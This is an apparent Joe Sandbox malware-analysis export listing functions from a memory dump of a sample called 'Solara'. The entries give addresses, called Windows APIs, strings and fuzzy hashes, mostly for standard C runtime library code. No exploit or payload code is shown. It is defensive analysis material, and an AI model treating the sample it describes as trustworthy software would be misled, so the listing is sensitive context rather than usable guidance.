Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: __is_exception_typeof
String ID: MOC$RCC$csm
API String ID: 3140442014-2671469338
Opcode ID: ee2ef3ddf6544d97f2b3c80ea289228456547011f157376468e3f91d248d0109
Instruction ID: 860f509af8e1460b6b406a4ec6c0bd3de7876aac35add530b7b3aa37a123fb8e
Opcode Fuzzy Hash: ee2ef3ddf6544d97f2b3c80ea289228456547011f157376468e3f91d248d0109
Instruction Fuzzy Hash: 44110839114205DFC728EF98C402A9AB7E8EF00316F250199EC44CB261D774EEC4DBD9

Function 00C399D4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C3F5D4: _Yarn.LIBCPMT ref: 00C3F5E7

_Maklocstr.LIBCPMT ref: 00C39A10

Part of subcall function 00C41306: _Yarn.LIBCPMT ref: 00C41319

_Maklocstr.LIBCPMT ref: 00C39A29

Part of subcall function 00C39BE2: Concurrency::cancel_current_task.LIBCPMT ref: 00C39C84

_Maklocstr.LIBCPMT ref: 00C39A38

Strings

:AM:am:PM:pm, xrefs: 00C39A30

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: Maklocstr$Yarn$Concurrency::cancel_current_task
String ID: :AM:am:PM:pm
API String ID: 3924990383-1966799564
Opcode ID: 66a299738eaa3c5865efca21e65a018b31588c891db1021e930bb5bd7617c727
Instruction ID: 398a9d6ec0bcb4376b8133ea243f55aa1fe9cfacb9365d02bff45271db8eacde
Opcode Fuzzy Hash: 66a299738eaa3c5865efca21e65a018b31588c891db1021e930bb5bd7617c727
Instruction Fuzzy Hash: D101A7B2D002087BDB10AFB4BC86D9FB7BCEB81754F10442AF545AB141DBB4AD059760

Function 00C56139 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 00C56156

Part of subcall function 00C5CC2D: _vsnprintf.LEGACY_STDIO_DEFINITIONS ref: 00C5CC3D

swprintf.LIBCMT ref: 00C56179

Part of subcall function 00C2C4F2: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C2C504

Strings

%lf, xrefs: 00C5614C, 00C56151, 00C56176
$A$A, xrefs: 00C5617E

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: ___swprintf_l__vswprintf_c_l_vsnprintfswprintf
String ID: $A$A$%lf
API String ID: 3672277462-2139334517
Opcode ID: e9f0a1b82f82fc855c1ff69e8ec34a4e9eb818c77330bf049daba57c2924cd5a
Instruction ID: f71a5696d0ab4ff5951b0d1356970025b49c89cdebda70032f3168c2033e40ea
Opcode Fuzzy Hash: e9f0a1b82f82fc855c1ff69e8ec34a4e9eb818c77330bf049daba57c2924cd5a
Instruction Fuzzy Hash: 05F0F0B9100118BADB15AB84DC8AFBF7F6CDF85395F014098FA8816242DB356E05E3B5

Function 00C56199 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 00C561B2

Part of subcall function 00C5CC2D: _vsnprintf.LEGACY_STDIO_DEFINITIONS ref: 00C5CC3D

swprintf.LIBCMT ref: 00C561D5

Part of subcall function 00C2C4F2: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C2C504

Strings

%lf, xrefs: 00C561A8, 00C561AD, 00C561D2
$B$B, xrefs: 00C561DA

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: ___swprintf_l__vswprintf_c_l_vsnprintfswprintf
String ID: $B$B$%lf
API String ID: 3672277462-164349752
Opcode ID: e18546b3fabb63f51ba93346a37418d9f82eace003b91639c34964507b990b37
Instruction ID: 2e60ce095ac6870c4b4d3a3885cf1c6efe6e264ffda1c5836c35876132e1b5c5
Opcode Fuzzy Hash: e18546b3fabb63f51ba93346a37418d9f82eace003b91639c34964507b990b37
Instruction Fuzzy Hash: 5BF024B5100018BADB147B84CC8AFBF3B6CDF45395F018098FA8817242CB35AE05E3B5

Function 00C5CF87 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00C5CE84,00000000,?,00D11604,?,?,?,00C5D0DB,00000004,InitializeCriticalSectionEx,00CAC694,InitializeCriticalSectionEx), ref: 00C5CF94
GetLastError.KERNEL32(?,00C5CE84,00000000,?,00D11604,?,?,?,00C5D0DB,00000004,InitializeCriticalSectionEx,00CAC694,InitializeCriticalSectionEx,00000000,?,00C55C9D), ref: 00C5CF9E
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00C5CFC6

Strings

api-ms-, xrefs: 00C5CFAB

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: dff0674cea24bc4f2b3ed264d9288f3d4f714543d98f9ad8a9ccbe779db3e7f4
Instruction ID: 822be5560bddd7221e6180bf4e0141294ba04c881cd038d771a38970f7400761
Opcode Fuzzy Hash: dff0674cea24bc4f2b3ed264d9288f3d4f714543d98f9ad8a9ccbe779db3e7f4
Instruction Fuzzy Hash: 86E01A31384308BAEB201BA0ED4AB5C3A6BAB16B89F100020FA0CA80E1D7719A54D649

Function 00C8EB15 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,016E13CA), ref: 00C8EB78

Part of subcall function 00C93E4B: WideCharToMultiByte.KERNEL32(00C79714,00000000,00000000,00000000,00000000,00000000,000000FF,0000FDE9,00000000,00000000,00000000,?,00C91CB6,00000000,00000000,00C79714), ref: 00C93EF7

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C8EDD3
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00C8EE1B
GetLastError.KERNEL32 ref: 00C8EEBE

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 2f30783d7b479e25c343c329e800c27a24b438b5869ef8210c7ff05300984414
Instruction ID: 4a3cfab51c5f019ac1537d899b7e78ac0cfe7852a9ca71648a70d36fd0c9bedf
Opcode Fuzzy Hash: 2f30783d7b479e25c343c329e800c27a24b438b5869ef8210c7ff05300984414
Instruction Fuzzy Hash: 92D15BB5D00258AFCF15DFA8D880AEEBBB5FF09308F18452AE865E7351D730A946CB54

Function 00C58DAE Relevance: 6.2, APIs: 4, Instructions: 192COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C58DB5
UnDecorator::getSymbolName.LIBCMT ref: 00C58E47
DName::operator+.LIBCMT ref: 00C58F4B
DName::DName.LIBVCRUNTIME ref: 00C58FEE

Part of subcall function 00C567BE: shared_ptr.LIBCMT ref: 00C567DA

Part of subcall function 00C56A58: DName::DName.LIBVCRUNTIME ref: 00C56AA6

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: Name$Name::$Decorator::getH_prolog3Name::operator+Symbolshared_ptr
String ID:
API String ID: 1134295639-0
Opcode ID: db367705d8a7c24025e20780d4e22b2e16950bb6b47b10beab9720d4827e4a19
Instruction ID: 1f3ae55cf48194115b7568efb7f944b04e847e4100e36478f76f007bf0f995ee
Opcode Fuzzy Hash: db367705d8a7c24025e20780d4e22b2e16950bb6b47b10beab9720d4827e4a19
Instruction Fuzzy Hash: 9D715C7DC002199FDB10DFE4D881AEDBBB5AB0C312F18411AED15BB251DB359A8DCB68

Function 00C5943D Relevance: 6.2, APIs: 4, Instructions: 169COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 00C59571

Part of subcall function 00C5640D: __aulldvrm.LIBCMT ref: 00C5643E

DName::operator+.LIBCMT ref: 00C594D2
DName::operator=.LIBVCRUNTIME ref: 00C595B6
DName::DName.LIBVCRUNTIME ref: 00C595E8

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator=__aulldvrm
String ID:
API String ID: 2973644308-0
Opcode ID: 1c331f1df1ff84406c8e9c4edc31fe4a1ed61f1e754b2d19fa516586527f4ce7
Instruction ID: f4e7e560aa5a4b2c846f897978e51c43c1bdcebcb338ab820ea7f7a7a6c7cc1a
Opcode Fuzzy Hash: 1c331f1df1ff84406c8e9c4edc31fe4a1ed61f1e754b2d19fa516586527f4ce7
Instruction Fuzzy Hash: 006171BC900215EFCB05CF94D8819EDBBB4FB09301F54829AED11AB351DB719A89DF94

Function 00C54ADF Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00C54BA6
___AdjustPointer.LIBCMT ref: 00C54BC9
___AdjustPointer.LIBCMT ref: 00C54C65

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 9732d81c7b5ec58b23fa43833a74352f42b0236d75f7c5aa85310518b3e1793e
Instruction ID: a837298a1f0e59d67c857f65038b8bb0f3ea8256e9c2fbfb948e8994f0c33f46
Opcode Fuzzy Hash: 9732d81c7b5ec58b23fa43833a74352f42b0236d75f7c5aa85310518b3e1793e
Instruction Fuzzy Hash: 7E51D079602606AFDB2D8F15C841BBA73A4FF4031AF24442DEC1687291D731EDC9D758

Function 00C5916E Relevance: 6.1, APIs: 4, Instructions: 131COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 00C591A1

Part of subcall function 00C56782: DName::operator+=.LIBCMT ref: 00C56798

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: Name::operator+Name::operator+=
String ID:
API String ID: 382699925-0
Opcode ID: 3097359a5c3aae91154306058e3d2360636c637282c4335bc48baa7833f4fa16
Instruction ID: 40132a2cf9085e8657d6d3458ddfbe1bc80c8c30202f6ca29b995f84f9285205
Opcode Fuzzy Hash: 3097359a5c3aae91154306058e3d2360636c637282c4335bc48baa7833f4fa16
Instruction Fuzzy Hash: 6F414FB9D0020AEACF04CFA5D9859EEBBB8FB05305F104159E915E7250D7719BC8DB98

Function 00C2C200 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C2C207

Part of subcall function 00C266B7: __EH_prolog3.LIBCMT ref: 00C266BE
Part of subcall function 00C266B7: std::_Lockit::_Lockit.LIBCPMT ref: 00C266C9
Part of subcall function 00C266B7: std::locale::_Setgloballocale.LIBCPMT ref: 00C266E4
Part of subcall function 00C266B7: _Yarn.LIBCPMT ref: 00C266FA
Part of subcall function 00C266B7: std::_Lockit::~_Lockit.LIBCPMT ref: 00C26737

std::_Lockit::_Lockit.LIBCPMT ref: 00C2C22B
std::locale::_Setgloballocale.LIBCPMT ref: 00C2C27A
std::_Lockit::~_Lockit.LIBCPMT ref: 00C2C2DA

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_Setgloballocalestd::locale::_$Yarn
String ID:
API String ID: 2301162320-0
Opcode ID: 111e36ff53e2894795a3f89cc3ba03265a78bfcb70ff05b4cc2a73c450438a29
Instruction ID: 26a0caeec93bdbac916dbc6a57a923a7275c6da8b01e47cfc3244608fc3ca274
Opcode Fuzzy Hash: 111e36ff53e2894795a3f89cc3ba03265a78bfcb70ff05b4cc2a73c450438a29
Instruction Fuzzy Hash: 4B215C35A00225DFDF04EFA8E8C1A6E77A4EF59310B054069E916DB792DF34EE41DB90

Function 00C95052 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00C93E4B: WideCharToMultiByte.KERNEL32(00C79714,00000000,00000000,00000000,00000000,00000000,000000FF,0000FDE9,00000000,00000000,00000000,?,00C91CB6,00000000,00000000,00C79714), ref: 00C93EF7

GetLastError.KERNEL32 ref: 00C950B6
__dosmaperr.LIBCMT ref: 00C950BD
GetLastError.KERNEL32(?,?,?,?), ref: 00C950F7
__dosmaperr.LIBCMT ref: 00C950FE

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: d8e570d2d64cbe41197706e0bc8515d4cae2d600236ab448def282e9c76dd330
Instruction ID: 9833e8e1074412fa0bbcc4e293c6882666ebc6cd0bc7e5b12628792fb49e6968
Opcode Fuzzy Hash: d8e570d2d64cbe41197706e0bc8515d4cae2d600236ab448def282e9c76dd330
Instruction Fuzzy Hash: 8921D471604A0AAFCF22AF71CC89A2FB7A8FF053647108518F92997241D731EE1097A0

Function 00C82B6B Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fabab3d588119dd860cc0b204ab68644ed1ea7db827feb7511818860bcd23996
Instruction ID: ad6d329a35b60ca182ac4f4189cd94fb65204b387fe672fa70e7e23b7f243728
Opcode Fuzzy Hash: fabab3d588119dd860cc0b204ab68644ed1ea7db827feb7511818860bcd23996
Instruction Fuzzy Hash: 2421A171205209AFDB21BF61DC4997EB7A8FF0436C7104A19F929D7140DB31ED10D7A4

Function 00C96DA8 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00C96DB0

Part of subcall function 00C93E4B: WideCharToMultiByte.KERNEL32(00C79714,00000000,00000000,00000000,00000000,00000000,000000FF,0000FDE9,00000000,00000000,00000000,?,00C91CB6,00000000,00000000,00C79714), ref: 00C93EF7

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C96DE8
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C96E08

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 7b9f1a9616eba70aa5d94818e01d26ffbbff103e739be7b2083c2c49b1d2f1a0
Instruction ID: 37b3f55d2d43e28263cdf36736301279fd6e37f0fe9e9f813e8404fa22ca8f5f
Opcode Fuzzy Hash: 7b9f1a9616eba70aa5d94818e01d26ffbbff103e739be7b2083c2c49b1d2f1a0
Instruction Fuzzy Hash: AF1184F65015167FAF1127B69C8EEBF796CDF8A3983100024F51292141FB349E01A271

Function 00C2A7E6 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C2A7ED
std::_Lockit::_Lockit.LIBCPMT ref: 00C2A7F7
std::_Lockit::~_Lockit.LIBCPMT ref: 00C2A89E
Concurrency::cancel_current_task.LIBCPMT ref: 00C2A8A9

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: Lockitstd::_$Concurrency::cancel_current_taskH_prolog3Lockit::_Lockit::~_
String ID:
API String ID: 4244582100-0
Opcode ID: 29767b65b6de1e39a47b73f11de93f65e5eee9b0a93c535b606dcdcec0510467
Instruction ID: 0ceeeb62dabbb0fb9ed6d404ee16bf18fd66cd461436a038125a5d5d9e5afedc
Opcode Fuzzy Hash: 29767b65b6de1e39a47b73f11de93f65e5eee9b0a93c535b606dcdcec0510467
Instruction Fuzzy Hash: 80215C34A0062A9FCB08EF14D891AADB775FF49710F008459E9269B7E1DB70ED51CF81

Function 00C91363 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 00C91379
GetLastError.KERNEL32(?,?,?,?), ref: 00C91386
SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 00C913AC
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 00C913D2

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: FilePointer$ErrorLast
String ID:
API String ID: 142388799-0
Opcode ID: d636973d8147ce75e799f91795849c169114b9ceb1783e4ba5bc2a05e13de960
Instruction ID: 8a37bfa01f43f4d8126b13ba17d1744d85aa78b23b6c1f3a45bdb8d634176986
Opcode Fuzzy Hash: d636973d8147ce75e799f91795849c169114b9ceb1783e4ba5bc2a05e13de960
Instruction Fuzzy Hash: 4C11577180121AFBCF109FA5CC4AA9E3F79FF01364F148148F924921A0D731CA50DBA0

Function 00CA2DBB Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 00CA2DD5
GetLastError.KERNEL32 ref: 00CA2DE1

Part of subcall function 00CA2E8A: CloseHandle.KERNEL32(FFFFFFFE,00CA2ED4,?,00C9E9B6,00000000,00000001,00000000,016E13CA,?,00C8EF12,016E13CA,00000000,00000000,016E13CA,016E13CA), ref: 00CA2E9A

___initconout.LIBCMT ref: 00CA2DF1

Part of subcall function 00CA2E4C: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00CA2E7B,00C9E9A3,016E13CA,?,00C8EF12,016E13CA,00000000,00000000,016E13CA), ref: 00CA2E5F

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 00CA2E05

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 65f5249a8441483fe71fc2778d22b0a93c3f54b77fe16f41acf229f4ac34c0ac
Instruction ID: 6c8f85d9b8398fc1f95705562ac8c80ca8584b37e274c0bed68ebfecefa50b66
Opcode Fuzzy Hash: 65f5249a8441483fe71fc2778d22b0a93c3f54b77fe16f41acf229f4ac34c0ac
Instruction Fuzzy Hash: 6AF05E36100212BBCB221BDADC09B4A7FA6FB8A355B140414F69AC2530DB329890EF60

Function 00CA2EA1 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00C9E9B6,00000000,00000001,00000000,016E13CA,?,00C8EF12,016E13CA,00000000,00000000), ref: 00CA2EB8
GetLastError.KERNEL32(?,00C9E9B6,00000000,00000001,00000000,016E13CA,?,00C8EF12,016E13CA,00000000,00000000,016E13CA,016E13CA,?,00C8F4E3,00000000), ref: 00CA2EC4

Part of subcall function 00CA2E8A: CloseHandle.KERNEL32(FFFFFFFE,00CA2ED4,?,00C9E9B6,00000000,00000001,00000000,016E13CA,?,00C8EF12,016E13CA,00000000,00000000,016E13CA,016E13CA), ref: 00CA2E9A

___initconout.LIBCMT ref: 00CA2ED4

Part of subcall function 00CA2E4C: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00CA2E7B,00C9E9A3,016E13CA,?,00C8EF12,016E13CA,00000000,00000000,016E13CA), ref: 00CA2E5F

WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00C9E9B6,00000000,00000001,00000000,016E13CA,?,00C8EF12,016E13CA,00000000,00000000,016E13CA), ref: 00CA2EE9

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
